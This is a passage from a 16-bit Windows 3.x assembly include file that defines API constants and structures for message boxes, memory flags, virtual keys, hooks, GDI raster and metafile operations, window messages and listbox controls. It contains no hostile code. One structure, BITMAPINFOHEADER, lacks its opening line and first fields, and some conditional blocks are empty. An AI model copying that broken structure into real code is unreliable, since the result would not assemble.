SB_PAGEDOWN = 3
SB_THUMBPOSITION = 4
SB_THUMBTRACK = 5
SB_TOP = 6
SB_BOTTOM = 7
SB_ENDSCROLL = 8
;
; MessageBox type flags
;
IFNDEF NOMB
MB_OK = 0000H
MB_OKCANCEL = 0001H
MB_ABORTRETRYIGNORE = 0002H
MB_YESNOCANCEL = 0003H
MB_YESNO = 0004H
MB_RETRYCANCEL = 0005H
MB_ICONHAND = 0010H
MB_ICONQUESTION = 0020H
MB_ICONEXCLAMATION = 0030H
MB_ICONASTERISK = 0040H
MB_DEFBUTTON1 = 0000H
MB_DEFBUTTON2 = 0100H
MB_DEFBUTTON3 = 0200H
MB_APPLMODAL = 0000H
MB_SYSTEMMODAL = 1000H
MB_TASKMODAL = 2000H
MB_NOFOCUS = 8000H
;
; Conventional dialog box and message box command IDs
;
IDOK = 1
IDCANCEL = 2
IDABORT = 3
IDRETRY = 4
IDIGNORE = 5
IDYES = 6
IDNO = 7
;
; Flags for OpenFile
;
OF_READ = 0000H
OF_WRITE = 0001H
OF_READWRITE = 0002H
OF_SHARE_COMPAT = 0000H
OF_SHARE_EXCLUSIVE = 0010H
OF_SHARE_DENY_WRITE = 0020H
OF_SHARE_DENY_READ = 0030H
OF_SHARE_DENY_NONE = 0040H
OF_PARSE = 0100H
OF_DELETE = 0200H
OF_VERIFY = 0400H ; Used with OF_REOPEN
OF_SEARCH = 0400H ; Used without OF_REOPEN
OF_CANCEL = 0800H
OF_CREATE = 1000H
OF_PROMPT = 2000H
OF_EXIST = 4000H
OF_REOPEN = 8000H
TF_FORCEDRIVE = 80H
OPENSTRUC STRUC
opLen db ?
opDisk db ?
opXtra dw ?
opDate dw ?
opTime dw ?
opFile db 120 dup (?)
OPENSTRUC ENDS
;
; DrawText format flags
;
DT_LEFT = 00H
DT_CENTER = 01H
DT_RIGHT = 02H
DT_TOP = 00H
DT_VCENTER = 04H
DT_BOTTOM = 08H
DT_WORDBREAK = 10H
DT_SINGLELINE = 20H
DT_EXPANDTABS = 40H
DT_TABSTOP = 80H
DT_NOCLIP = 0100H
DT_EXTERNALLEADING = 0200H
DT_CALCRECT = 0400H
DT_NOPREFIX = 0800H
DT_INTERNAL = 1000H
ENDIF
;
; ExtFloodFill style flags
;
FLOODFILLBORDER = 0
FLOODFILLSURFACE = 1
;
; Memory manager flags
;
LMEM_FIXED = 0000h
LMEM_MOVEABLE = 0002h
LMEM_NOCOMPACT = 0010H
LMEM_NODISCARD = 0020H
LMEM_ZEROINIT = 0040h
LMEM_MODIFY = 0080H
LMEM_DISCARDABLE= 0F00h
LHND = LMEM_MOVEABLE+LMEM_ZEROINIT
LPTR = LMEM_FIXED+LMEM_ZEROINIT
; Flags returned by LocalFlags (in addition to LMEM_DISCARDABLE)
LMEM_DISCARDED = 4000H
LMEM_LOCKCOUNT = 00FFH
NONZEROLHND = LMEM_MOVEABLE
NONZEROLPTR = LMEM_FIXED
GMEM_FIXED = 0000h
GMEM_MOVEABLE = 0002h
GMEM_NOCOMPACT = 0010h
GMEM_NODISCARD = 0020h
GMEM_ZEROINIT = 0040h
GMEM_MODIFY = 0080h
GMEM_DISCARDABLE= 0100h
GMEM_NOT_BANKED = 1000h
GMEM_DDESHARE = 2000h
GMEM_SHARE = 2000h
GMEM_NOTIFY = 4000h
GMEM_LOWER = GMEM_NOT_BANKED
GHND = GMEM_MOVEABLE+GMEM_ZEROINIT
GPTR = GMEM_FIXED+GMEM_ZEROINIT
WF_PMODE = 0001h
WF_CPU286 = 0002h
WF_CPU386 = 0004h
WF_CPU486 = 0008h
WF_STANDARD = 0010h
WF_WIN286 = 0010h
WF_ENHANCED = 0020h
WF_WIN386 = 0020h
WF_CPU086 = 0040h
WF_CPU186 = 0080h
WF_LARGEFRAME = 0100h
WF_SMALLFRAME = 0200h
WF_80x87 = 0400h
WF_PAGING = 0800h
WF_WLO = 8000h
IFNDEF NOVK
VK_LBUTTON = 01H
VK_RBUTTON = 02H
VK_CANCEL = 03H
VK_BACK = 08H
VK_TAB = 09H
VK_CLEAR = 0cH
VK_RETURN = 0dH
VK_SHIFT = 10H
VK_CONTROL = 11H
VK_MENU = 12H
VK_PAUSE = 13H
VK_CAPITAL = 14H
VK_ESCAPE = 1bH
VK_SPACE = 20H
VK_PRIOR = 21H
VK_NEXT = 22H
VK_END = 23H
VK_HOME = 24H
VK_LEFT = 25H
VK_UP = 26H
VK_RIGHT = 27H
VK_DOWN = 28H
; VK_A thru VK_Z are the same as their ASCII equivalents: 'A' thru 'Z'
; VK_0 thru VK_9 are the same as their ASCII equivalents: '0' thru '0'
VK_PRINT = 2aH
VK_EXECUTE = 2bH
VK_SNAPSHOT = 2ch ; Printscreen key..
VK_INSERT = 2dH
VK_DELETE = 2eH
VK_HELP = 2fH
VK_NUMPAD0 = 60H
VK_NUMPAD1 = 61H
VK_NUMPAD2 = 62H
VK_NUMPAD3 = 63H
VK_NUMPAD4 = 64H
VK_NUMPAD5 = 65H
VK_NUMPAD6 = 66H
VK_NUMPAD7 = 67H
VK_NUMPAD8 = 68H
VK_NUMPAD9 = 69H
VK_MULTIPLY = 6AH
VK_ADD = 6BH
VK_SEPARATER = 6CH
VK_SUBTRACT = 6DH
VK_DECIMAL = 6EH
VK_DIVIDE = 6FH
VK_F1 = 70H
VK_F2 = 71H
VK_F3 = 72H
VK_F4 = 73H
VK_F5 = 74H
VK_F6 = 75H
VK_F7 = 76H
VK_F8 = 77H
VK_F9 = 78H
VK_F10 = 79H
VK_F11 = 7aH
VK_F12 = 7bH
VK_F13 = 7cH
VK_F14 = 7dH
VK_F15 = 7eH
VK_F16 = 7fH
VK_F17 = 80H
VK_F18 = 81H
VK_F19 = 82H
VK_F20 = 83H
VK_F21 = 84H
VK_F22 = 85H
VK_F23 = 86H
VK_F24 = 87H
VK_NUMLOCK = 90H
VK_SCROLL = 91H
ENDIF
IFNDEF NOWH
; SetWindowsHook() codes
WH_MSGFILTER = (-1)
WH_JOURNALRECORD = 0
WH_JOURNALPLAYBACK = 1
WH_KEYBOARD = 2
WH_GETMESSAGE = 3
WH_CALLWNDPROC = 4
IFNDEF NOWIN31
WH_CBT = 5
WH_SYSMSGFILTER = 6
WH_MOUSE = 7
WH_HARDWARE = 8
WH_DEBUG = 9
ENDIF
;
; Hook Codes
HC_GETLPLPFN = (-3)
HC_LPLPFNNEXT = (-2)
HC_LPFNNEXT = (-1)
HC_ACTION = 0
HC_GETNEXT = 1
HC_SKIP = 2
HC_NOREM = 3
HC_NOREMOVE = 3
HC_SYSMODALON = 4
HC_SYSMODALOFF = 5
;
; CBT Hook Codes
HCBT_MOVESIZE = 0
HCBT_MINMAX = 1
HCBT_QS = 2
HCBT_CREATEWND = 3
HCBT_DESTROYWND = 4
HCBT_ACTIVATE = 5
HCBT_CLICKSKIPPED = 6
HCBT_KEYSKIPPED = 7
HCBT_SYSCOMMAND = 8
HCBT_SETFOCUS = 9
;
; WH_MSGFILTER Filter Proc Codes
MSGF_DIALOGBOX = 0
MSGF_MENU = 2
MSGF_MOVE = 3
MSGF_SIZE = 4
MSGF_SCROLLBAR = 5
MSGF_NEXTWINDOW = 6
;
; Window Manager Hook Codes
WC_INIT = 1
WC_SWP = 2
WC_DEFWINDOWPROC = 3
WC_MINMAX = 4
WC_MOVE = 5
WC_SIZE = 6
WC_DRAWCAPTION = 7
;
ENDIF ;NOWH
; GetWindow() Constants
GW_HWNDFIRST = 0
GW_HWNDLAST = 1
GW_HWNDNEXT = 2
GW_HWNDPREV = 3
GW_OWNER = 4
GW_CHILD = 5
;*************************************************************************
;
; Misc structures & constants
;
;*************************************************************************
IFNDEF NOMST
POINT struc
ptX dw ?
ptY dw ?
POINT ends
LOGPEN struc
lopnStyle dw ?
lopnWidth db (SIZE POINT) DUP(?)
lopnColor dd ?
LOGPEN ends
BITMAP STRUC
bmType DW ?
bmWidth DW ?
bmHeight DW ?
bmWidthBytes DW ?
bmPlanes DB ?
bmBitsPixel DB ?
bmBits DD ?
BITMAP ENDS
RGBTRIPLE struc
rgbBlue db ?
rgbGreen db ?
rgbRed db ?
RGBTRIPLE ends
RGBQUAD struc
rgbqBlue db ?
rgbqGreen db ?
rgbqRed db ?
rgbqReserved db ?
RGBQUAD ends
biCompression dd ?
biSizeImage dd ?
biXPelsPerMeter dd ?
biYPelsPerMeter dd ?
biClrUsed dd ?
biClrImportant dd ?
BITMAPINFOHEADER ends
BITMAPINFO struc
bmiHeader db (SIZE BITMAPINFOHEADER) DUP (?)
bmiColors db ? ; array of RGBQUADs
BITMAPINFO ends
BITMAPCOREINFO struc
bmciHeader db (SIZE BITMAPCOREHEADER) DUP (?)
bmciColors db ? ; array of RGBTRIPLEs
BITMAPCOREINFO ends
BITMAPFILEHEADER struc
bfType dw ?
bfSize dd ?
bfReserved1 dw ?
bfReserved2 dw ?
bfOffBits dd ?
BITMAPFILEHEADER ends
WNDSTRUC struc
WSwndStyle dd ?
WSwndID dw ?
WSwndText dw ?
WSwndParent dw ?
WSwndInstance dw ?
WSwndClassProc dd ?
WNDSTRUC ends
;
; Message structure
;
MSGSTRUCT struc
msHWND dw ?
msMESSAGE dw ?
msWPARAM dw ?
msLPARAM dd ?
msTIME dd ?
msPT dd ?
MSGSTRUCT ends
NEWPARMS struc
nprmHwnd dw ?
nprmCmd db ?
NEWPARMS ends
ENDIF
PAINTSTRUCT STRUC
PShdc DW ?
PSfErase DW ?
PSrcPaint DB size RECT dup(?)
PSfRestore DW ?
PSfIncUpdate DW ?
PSrgbReserved DB 16 dup(?)
PAINTSTRUCT ENDS
CREATESTRUCT struc
cs_lpCreateParams dd ?
cs_hInstance dw ?
cs_hMenu dw ?
cs_hwndParent dw ?
cs_cy dw ?
cs_cx dw ?
cs_y dw ?
cs_x dw ?
cs_style dd ?
cs_lpszName dd ?
cs_lpszClass dd ?
cs_dwExStyle dd ?
CREATESTRUCT ends
;
; PostError constants
;
WARNING = 0 ; command codes
MINOR_ERROR = 1
FATAL_ERROR = 2
IFNDEF NORASTOPS
;
; Binary raster ops
;
R2_BLACK = 1
R2_NOTMERGEPEN = 2
R2_MASKNOTPEN = 3
R2_NOTCOPYPEN = 4
R2_MASKPENNOT = 5
R2_NOT = 6
R2_XORPEN = 7
R2_NOTMASKPEN = 8
R2_MASKPEN = 9
R2_NOTXORPEN = 10
R2_NOP = 11
R2_MERGENOTPEN = 12
R2_COPYPEN = 13
R2_MERGEPENNOT = 14
R2_MERGEPEN = 15
R2_WHITE = 16
;
; Ternary raster ops
;
SRCCOPY_L = 0020h ;dest=source
SRCCOPY_H = 00CCh
SRCPAINT_L = 0086h ;dest=source OR dest
SRCPAINT_H = 00EEh
SRCAND_L = 00C6h ;dest=source AND dest
SRCAND_H = 0088h
SRCINVERT_L = 0046h ;dest= source XOR dest
SRCINVERT_H = 0066h
SRCERASE_L = 0328h ;dest= source AND (not dest )
SRCERASE_H = 0044h
NOTSRCCOPY_L = 0008h ;dest= (not source)
NOTSRCCOPY_H = 0033h
NOTSRCERASE_L = 00A6h ;dest= (not source) AND (not dest)
NOTSRCERASE_H = 0011h
MERGECOPY_L = 00CAh ;dest= (source AND pattern)
MERGECOPY_H = 00C0h
MERGEPAINT_L = 0226h ;dest= (source AND pattern) OR dest
MERGEPAINT_H = 00BBh
PATCOPY_L = 0021h ;dest= pattern
PATCOPY_H = 00F0h
PATPAINT_L = 0A09h ;DPSnoo
PATPAINT_H = 00FBh
PATINVERT_L = 0049h ;dest= pattern XOR dest
PATINVERT_H = 005Ah
DSTINVERT_L = 0009h ;dest= (not dest)
DSTINVERT_H = 0055h
BLACKNESS_L = 0042h ;dest= BLACK
BLACKNESS_H = 0000h
WHITENESS_L = 0062h ;dest= WHITE
WHITENESS_H = 00FFh
;
; StretchBlt modes
;
BLACKONWHITE = 1
WHITEONBLACK = 2
COLORONCOLOR = 3
;
; New StretchBlt modes
;
STRETCH_ANDSCANS = 1
STRETCH_ORSCANS = 2
STRETCH_DELETESCANS = 3
;
; PolyFill modes
;
ALTERNATE = 1
WINDING = 2
ENDIF
;
; Text Alignment Options
;
TA_NOUPDATECP = 0
TA_UPDATECP = 1
TA_LEFT = 0
TA_RIGHT = 2
TA_CENTER = 6
TA_TOP = 0
TA_BOTTOM = 8
TA_BASELINE = 24
ETO_GRAYED = 1
ETO_OPAQUE = 2
ETO_CLIPPED = 4
ASPECT_FILTERING = 1
ifndef NOMETAFILE
; Metafile Functions */
META_SETBKCOLOR = 0201h
META_SETBKMODE = 0102h
META_SETMAPMODE = 0103h
META_SETROP2 = 0104h
META_SETRELABS = 0105h
META_SETPOLYFILLMODE = 0106h
META_SETSTRETCHBLTMODE = 0107h
META_SETTEXTCHAREXTRA = 0108h
META_SETTEXTCOLOR = 0209h
META_SETTEXTJUSTIFICATION = 020Ah
META_SETWINDOWORG = 020Bh
META_SETWINDOWEXT = 020Ch
META_SETVIEWPORTORG = 020Dh
META_SETVIEWPORTEXT = 020Eh
META_OFFSETWINDOWORG = 020Fh
META_SCALEWINDOWEXT = 0400h
META_OFFSETVIEWPORTORG = 0211h
META_SCALEVIEWPORTEXT = 0412h
META_LINETO = 0213h
META_MOVETO = 0214h
META_EXCLUDECLIPRECT = 0415h
META_INTERSECTCLIPRECT = 0416h
META_ARC = 0817h
META_ELLIPSE = 0418h
META_FLOODFILL = 0419h
META_PIE = 081Ah
META_RECTANGLE = 041Bh
META_ROUNDRECT = 061Ch
META_PATBLT = 061Dh
META_SAVEDC = 001Eh
META_SETPIXEL = 041Fh
META_OFFSETCLIPRGN = 0220h
META_TEXTOUT = 0521h
META_BITBLT = 0922h
META_STRETCHBLT = 0B23h
META_POLYGON = 0324h
META_POLYLINE = 0325h
META_ESCAPE = 0626h
META_RESTOREDC = 0127h
META_FILLREGION = 0228h
META_FRAMEREGION = 0429h
META_INVERTREGION = 012Ah
META_PAINTREGION = 012Bh
META_SELECTCLIPREGION = 012Ch
META_SELECTOBJECT = 012Dh
META_SETTEXTALIGN = 012Eh
META_DRAWTEXT = 062Fh
META_CHORD = 0830h
META_SETMAPPERFLAGS = 0231h
META_EXTTEXTOUT = 0a32h
META_SETDIBTODEV = 0d33h
META_SELECTPALETTE = 0234h
META_REALIZEPALETTE = 0035h
META_ANIMATEPALETTE = 0436h
META_SETPALENTRIES = 0037h
META_POLYPOLYGON = 0538h
META_RESIZEPALETTE = 0139h
META_DIBBITBLT = 0940h
META_DIBSTRETCHBLT = 0b41h
META_DIBCREATEPATTERNBRUSH = 0142h
META_STRETCHDIB = 0f43h
META_DELETEOBJECT = 01f0h
META_CREATEPALETTE = 00f7h
META_CREATEBRUSH = 00F8h
META_CREATEPATTERNBRUSH = 01F9h
META_CREATEPENINDIRECT = 02FAh
META_CREATEFONTINDIRECT = 02FBh
META_CREATEBRUSHINDIRECT = 02FCh
META_CREATEBITMAPINDIRECT = 02FDh
META_CREATEBITMAP = 06FEh
META_CREATEREGION = 06FFh
METARECORD struc
mr_rdSize dd ?
mr_rdFunction dw ?
mr_rdParm dw ?
METARECORD ends
METAFILEPICT struc
mfp_mm dw ?
mfp_xExt dw ?
mfp_yExt dw ?
mfp_hMF dw ?
METAFILEPICT ends
METAHEADER struc
mtType dw ?
mtHeaderSize dw ?
mtVersion dw ?
mtSize dd ?
mtNoObjects dw ?
mtMaxRecord dd ?
mtNoParameters dw ?
METAHEADER ends
endif ; NOMETAFILE
; GDI Escapes
NEWFRAME = 1
ABORTDOC = 2
NEXTBAND = 3
SETCOLORTABLE = 4
GETCOLORTABLE = 5
FLUSHOUTPUT = 6
DRAFTMODE = 7
QUERYESCSUPPORT = 8
SETABORTPROC = 9
STARTDOC = 10
;; This value conflicts with a std WIN386 MACRO definition
;;ENDDOC = 11
GETPHYSPAGESIZE = 12
GETPRINTINGOFFSET = 13
GETSCALINGFACTOR = 14
MFCOMMENT = 15
GETPENWIDTH = 16
SETCOPYCOUNT = 17
SELECTPAPERSOURCE = 18
DEVICEDATA = 19
PASSTHROUGH = 19
GETTECHNOLGY = 20
GETTECHNOLOGY = 20
SETENDCAP = 21
SETLINEJOIN = 22
SETMITERLIMIT = 23
BANDINFO = 24
DRAWPATTERNRECT = 25
GETVECTORPENSIZE = 26
GETVECTORBRUSHSIZE = 27
ENABLEDUPLEX = 28
ENABLEMANUALFEED = 29
GETSETPAPERBINS = 29
GETSETPRINTORIENT = 30
ENUMPAPERBINS = 31
GETEXTENDEDTEXTMETRICS = 256
GETEXTENTTABLE = 257
GETPAIRKERNTABLE = 258
GETTRACKKERNTABLE = 259
EXTTEXTOUT = 512
ENABLERELATIVEWIDTHS = 768
ENABLEPAIRKERNING = 769
SETKERNTRACK = 770
SETALLJUSTVALUES = 771
SETCHARSET = 772
GETSETSCREENPARAMS = 3072
STRETCHBLT = 2048
PR_JOBSTATUS = 0000
;
; Menu flags for Change/Check/Enable MenuItem
;
MF_INSERT = 0000h
MF_CHANGE = 0080h
MF_APPEND = 0100h
MF_DELETE = 0200h
MF_REMOVE = 1000h
MF_BYCOMMAND = 0000h
MF_BYPOSITION = 0400h
MF_SEPARATOR = 0800h
MF_ENABLED = 0000h
MF_GRAYED = 0001h
MF_DISABLED = 0002h
MF_UNCHECKED = 0000h
MF_CHECKED = 0008h
MF_USECHECKBITMAPS= 0200h
MF_STRING = 0000h
MF_BITMAP = 0004h
MF_OWNERDRAW = 0100h
MF_POPUP = 0010h
MF_MENUBARBREAK = 0020h
MF_MENUBREAK = 0040h
MF_UNHILITE = 0000h
MF_HILITE = 0080h
MF_SYSMENU = 2000h
MF_HELP = 4000h
MF_MOUSESELECT = 8000h
;
; System Menu Command Values
;
SC_SIZE = 0F000h
SC_MOVE = 0F010h
SC_MINIMIZE = 0F020h
SC_MAXIMIZE = 0F030h
SC_NEXTWINDOW = 0F040h
SC_PREVWINDOW = 0F050h
SC_CLOSE = 0F060h
SC_VSCROLL = 0F070h
SC_HSCROLL = 0F080h
SC_MOUSEMENU = 0F090h
SC_KEYMENU = 0F100h
SC_ARRANGE = 0F110h
SC_RESTORE = 0F120h
SC_TASKLIST = 0F130h
SC_SCREENSAVE = 0F140h
SC_HOTKEY = 0F150h
SC_ICON = SC_MINIMIZE
SC_ZOOM = SC_MAXIMIZE
;
; Window State Messages
;
IFNDEF NOWM
WM_STATE = 0000H
WM_NULL = 0000h
WM_CREATE = 0001h
WM_DESTROY = 0002h
WM_MOVE = 0003h
WM_SIZE = 0005h
WM_ACTIVATE = 0006h
WM_SETFOCUS = 0007h
WM_KILLFOCUS = 0008h
WM_ENABLE = 000Ah
WM_SETREDRAW = 000Bh
WM_SETTEXT = 000Ch
WM_GETTEXT = 000Dh
WM_GETTEXTLENGTH = 000Eh
WM_PAINT = 000Fh
WM_CLOSE = 0010h
WM_QUERYENDSESSION = 0011h
WM_QUIT = 0012h
WM_QUERYOPEN = 0013h
WM_ERASEBKGND = 0014h
WM_SYSCOLORCHANGE = 0015h
WM_ENDSESSION = 0016h
WM_SYSTEMERROR = 0017h
WM_SHOWWINDOW = 0018h
WM_CTLCOLOR = 0019h
WM_WININICHANGE = 001Ah
WM_DEVMODECHANGE = 001Bh
WM_ACTIVATEAPP = 001Ch
WM_FONTCHANGE = 001Dh
WM_TIMECHANGE = 001Eh
WM_CANCELMODE = 001Fh
WM_SETCURSOR = 0020h
WM_MOUSEACTIVATE = 0021h
WM_CHILDACTIVATE = 0022h
WM_QUEUESYNC = 0023h
WM_GETMINMAXINFO = 0024h
WM_PAINTICON = 0026h
WM_ICONERASEBKGND = 0027h
WM_NEXTDLGCTL = 0028h
WM_SPOOLERSTATUS = 002Ah
WM_DRAWITEM = 002Bh
WM_MEASUREITEM = 002Ch
WM_DELETEITEM = 002Dh
WM_VKEYTOITEM = 002Eh
WM_CHARTOITEM = 002Fh
WM_SETFONT = 0030h
WM_GETFONT = 0031h
WM_QUERYDRAGICON = 0037h
WM_COMPAREITEM = 0039h
WM_COMPACTING = 0041h
IFNDEF NOWIN31
WM_COMMNOTIFY = 0044h
WM_WINDOWPOSCHANGING= 0046h
WM_WINDOWPOSCHANGED = 0047h
WM_POWER = 0048h
ENDIF
WM_NCCREATE = 0081h
WM_NCDESTROY = 0082h
WM_NCCALCSIZE = 0083h
WM_NCHITTEST = 0084h
WM_NCPAINT = 0085h
WM_NCACTIVATE = 0086h
WM_GETDLGCODE = 0087h
WM_NCMOUSEMOVE = 00A0h
WM_NCLBUTTONDOWN = 00A1h
WM_NCLBUTTONUP = 00A2h
WM_NCLBUTTONDBLCLK = 00A3h
WM_NCRBUTTONDOWN = 00A4h
WM_NCRBUTTONUP = 00A5h
WM_NCRBUTTONDBLCLK = 00A6h
WM_NCMBUTTONDOWN = 00A7h
WM_NCMBUTTONUP = 00A8h
WM_NCMBUTTONDBLCLK = 00A9h
WM_KEYFIRST = 0100h
WM_KEYDOWN = 0100h
WM_KEYUP = 0101h
WM_CHAR = 0102h
WM_DEADCHAR = 0103h
WM_SYSKEYDOWN = 0104h
WM_SYSKEYUP = 0105h
WM_SYSCHAR = 0106h
WM_SYSDEADCHAR = 0107h
WM_KEYLAST = 0108h
WM_INITDIALOG = 0110h
WM_COMMAND = 0111h
WM_SYSCOMMAND = 0112h
WM_TIMER = 0113h
WM_HSCROLL = 0114h
WM_VSCROLL = 0115h
WM_INITMENU = 0116h
WM_INITMENUPOPUP = 0117h
WM_MENUSELECT = 011Fh
WM_MENUCHAR = 0120h
WM_ENTERIDLE = 0121h
WM_MOUSEFIRST = 0200h
WM_MOUSEMOVE = 0200h
WM_LBUTTONDOWN = 0201h
WM_LBUTTONUP = 0202h
WM_LBUTTONDBLCLK = 0203h
WM_RBUTTONDOWN = 0204h
WM_RBUTTONUP = 0205h
WM_RBUTTONDBLCLK = 0206h
WM_MBUTTONDOWN = 0207h
WM_MBUTTONUP = 0208h
WM_MBUTTONDBLCLK = 0209h
WM_MOUSELAST = 0209h
WM_PARENTNOTIFY = 0210h
WM_MDICREATE = 0220h
WM_MDIDESTROY = 0221h
WM_MDIACTIVATE = 0222h
WM_MDIRESTORE = 0223h
WM_MDINEXT = 0224h
WM_MDIMAXIMIZE = 0225h
WM_MDITILE = 0226h
WM_MDICASCADE = 0227h
WM_MDIICONARRANGE = 0228h
WM_MDIGETACTIVE = 0229h
WM_MDISETMENU = 0230h
WM_DROPFILES = 0233h
WM_CUT = 0300h
WM_COPY = 0301h
WM_PASTE = 0302h
WM_CLEAR = 0303h
WM_UNDO = 0304h
WM_RENDERFORMAT = 0305h
WM_RENDERALLFORMATS = 0306h
WM_DESTROYCLIPBOARD = 0307h
WM_DRAWCLIPBOARD = 0308h
WM_PAINTCLIPBOARD = 0309h
WM_VSCROLLCLIPBOARD = 030Ah
WM_SIZECLIPBOARD = 030Bh
WM_ASKCBFORMATNAME = 030Ch
WM_CHANGECBCHAIN = 030Dh
WM_HSCROLLCLIPBOARD = 030Eh
WM_QUERYNEWPALETTE = 030Fh
WM_PALETTEISCHANGING = 0310h
WM_PALETTECHANGED = 0311h
IFNDEF NOWIN31
WM_PENWINFIRST equ 0380h
WM_PENWINLAST equ 038Fh
ENDIF
; ShowWindow() Commands
SW_HIDE = 0
SW_SHOWNORMAL = 1
SW_NORMAL = 1
SW_SHOWMINIMIZED = 2
SW_SHOWMAXIMIZED = 3
SW_MAXIMIZE = 3
SW_SHOWNOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_SHOWMINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
;
; Special CreateWindow position value
;
CW_USEDEFAULT EQU 8000h
;
; Windows styles (the high words)
;
WS_OVERLAPPED = 00000h
WS_ICONICPOPUP = 0C000h
WS_POPUP = 08000h
WS_CHILD = 04000h
WS_MINIMIZE = 02000h
WS_VISIBLE = 01000h
WS_DISABLED = 00800h
WS_CLIPSIBLINGS = 00400h
WS_CLIPCHILDREN = 00200h
WS_MAXIMIZE = 00100h
WS_CAPTION = 000C0h ; WS_BORDER | WS_DLGFRAME
WS_BORDER = 00080h
WS_DLGFRAME = 00040h
WS_VSCROLL = 00020h
WS_HSCROLL = 00010h
WS_SYSMENU = 00008h
WS_THICKFRAME = 00004h
WS_HREDRAW = 00002h
WS_VREDRAW = 00001h
WS_GROUP = 00002h
WS_TABSTOP = 00001h
WS_MINIMIZEBOX = 00002h
WS_MAXIMIZEBOX = 00001h
WS_TILED = WS_OVERLAPPED
WS_ICONIC = WS_MINIMIZE
WS_SIZEBOX = WS_THICKFRAME
;
; predefined clipboard formats
;
CF_TEXT = 1
CF_BITMAP = 2
CF_METAFILEPICT = 3
CF_SYLK = 4
CF_DIF = 5
CF_TIFF = 6
CF_OEMTEXT = 7
CF_DIB = 8
CF_PALETTE = 9
CF_PENDATA = 10
CF_RIFF = 11
CF_WAVE = 12
MAKEINTRESOURCE MACRO a
mov ax,a
xor dx,dx
ENDM
;
; Predefined resource types
;
RT_CURSOR = 1 ; must be passed through MAKEINTRESOURCE
RT_BITMAP = 2
RT_ICON = 3
RT_MENU = 4
RT_DIALOG = 5
RT_STRING = 6
RT_FONTDIR = 7
RT_FONT = 8
RT_ACCELERATOR = 9
RT_RCDATA = 10
;** NOTE: if any new resource types are introduced above this point, then the
;** value of DIFFERENCE must be changed.
;** (RT_GROUP_CURSOR - RT_CURSOR) must always be equal to DIFFERENCE
;** (RT_GROUP_ICON - RT_ICON) must always be equal to DIFFERENCE
DIFFERENCE = 11
IFNDEF NOMDI
MDICREATESTRUCT struc
szClass dd ?
szTitle dd ?
hOwner dw ?
x dw ?
y dw ?
cxc dw ?
cyc dw ?
style dd ?
MDICREATESTRUCT ends
CLIENTCREATESTRUCT struc
hWindowMenu dw ?
idFirstChild dw ?
CLIENTCREATESTRUCT ends
ENDIF
; NOMDI
PALETTEENTRY struc
peRed db ?
peGreen db ?
peBlue db ?
peFlags db ?
PALETTEENTRY ends
; Logical Palette
LOGPALETTE struc
palVersion dw ?
palNumEntries dw ?
palPalEntry db ? ; array of PALETTEENTRY
LOGPALETTE ends
; PeekMessage() Options
PM_NOREMOVE = 0000h
PM_REMOVE = 0001h
PM_NOYIELD = 0002h
; SetWindowPos Flags
SWP_NOSIZE = 0001h
SWP_NOMOVE = 0002h
SWP_NOZORDER = 0004h
SWP_NOREDRAW = 0008h
SWP_NOACTIVATE = 0010h
SWP_DRAWFRAME = 0020h
SWP_SHOWWINDOW = 0040h
SWP_HIDEWINDOW = 0080h
SWP_NOCOPYBITS = 0100h
SWP_NOREPOSITION = 0200h
IFNDEF NOWINMESSAGES
; Listbox messages
LB_ADDSTRING = (WM_USER+1)
LB_INSERTSTRING = (WM_USER+2)
LB_DELETESTRING = (WM_USER+3)
LB_RESETCONTENT = (WM_USER+5)
LB_SETSEL = (WM_USER+6)
LB_SETCURSEL = (WM_USER+7)
LB_GETSEL = (WM_USER+8)
LB_GETCURSEL = (WM_USER+9)
LB_GETTEXT = (WM_USER+10)
LB_GETTEXTLEN = (WM_USER+11)
LB_GETCOUNT = (WM_USER+12)
LB_SELECTSTRING = (WM_USER+13)
LB_DIR = (WM_USER+14)
LB_GETTOPINDEX = (WM_USER+15)
LB_FINDSTRING = (WM_USER+16)
LB_GETSELCOUNT = (WM_USER+17)
LB_GETSELITEMS = (WM_USER+18)
LB_SETTABSTOPS = (WM_USER+19)
LB_GETHORIZONTALEXTENT = (WM_USER+20)
LB_SETHORIZONTALEXTENT = (WM_USER+21)
LB_SETTOPINDEX = (WM_USER+24)
LB_GETITEMRECT = (WM_USER+25)
LB_GETITEMDATA = (WM_USER+26)
LB_SETITEMDATA = (WM_USER+27)
LB_SELITEMRANGE = (WM_USER+28)
LB_SETCARETINDEX = (WM_USER+31)
LB_GETCARETINDEX = (WM_USER+32)
IFNDEF NOWIN31
LB_SETITEMHEIGHT = (WM_USER+33)
LB_GETITEMHEIGHT = (WM_USER+34)
LB_FINDSTRINGEXACT = (WM_USER+35)
ENDIF
ENDIF
; NOWINMESSAGES
; Listbox Styles
LBS_NOTIFY = 0001h
LBS_SORT = 0002h
LBS_NOREDRAW = 0004h
LBS_MULTIPLESEL = 0008h
LBS_OWNERDRAWFIXED = 0010h
LBS_OWNERDRAWVARIABLE = 0020h
LBS_HASSTRINGS = 0040h
LBS_USETABSTOPS = 0080h
LBS_NOINTEGRALHEIGHT = 0100h
LBS_MULTICOLUMN = 0200h
LBS_WANTKEYBOARDINPUT = 0400h
LBS_EXTENDEDSEL = 0800h
LBS_STANDARD = LBS_NOTIFY + LBS_SORT + WS_VSCROLL + WS_BORDER
LBS_DISABLENOSCROLL = 1000h
; Listbox Notification Codes
LBN_ERRSPACE = (-2)
LBN_SELCHANGE = 1
LBN_DBLCLK = 2
LBN_SELCANCEL = 3
LBN_SETFOCUS = 4
LBN_KILLFOCUS = 5
IFNDEF NOWINMESSAGES
ENDIF
; NOWINMESSAGES
IFNDEF NOWINMESSAGES
ENDIF
; NOWINMESSAGES
IFNDEF NOWINMESSAGES
ENDIF ;NOWINMESSAGES
; Dialog Codes
DLGC_WANTARROWS = 0001h ; /* Control wants arrow keys */
DLGC_WANTTAB = 0002h ; /* Control wants tab keys */
DLGC_WANTALLKEYS = 0004h ; /* Control wants all keys */
DLGC_WANTMESSAGE = 0004h ; /* Pass message to control */
DLGC_HASSETSEL = 0008h ; /* Understands EM_SETSEL message */
DLGC_DEFPUSHBUTTON = 0010h ; /* Default pushbutton */
DLGC_UNDEFPUSHBUTTON= 0020h ; /* Non-default pushbutton */
DLGC_RADIOBUTTON = 0040h ; /* Radio button */
DLGC_WANTCHARS = 0080h ; /* Want WM_CHAR messages */
DLGC_STATIC = 0100h ; /* Static item: don't include */
DLGC_BUTTON = 2000h ; /* Button item: can be checked */
IFNDEF NOWINMESSAGES
ENDIF ; NOWINMESSAGES
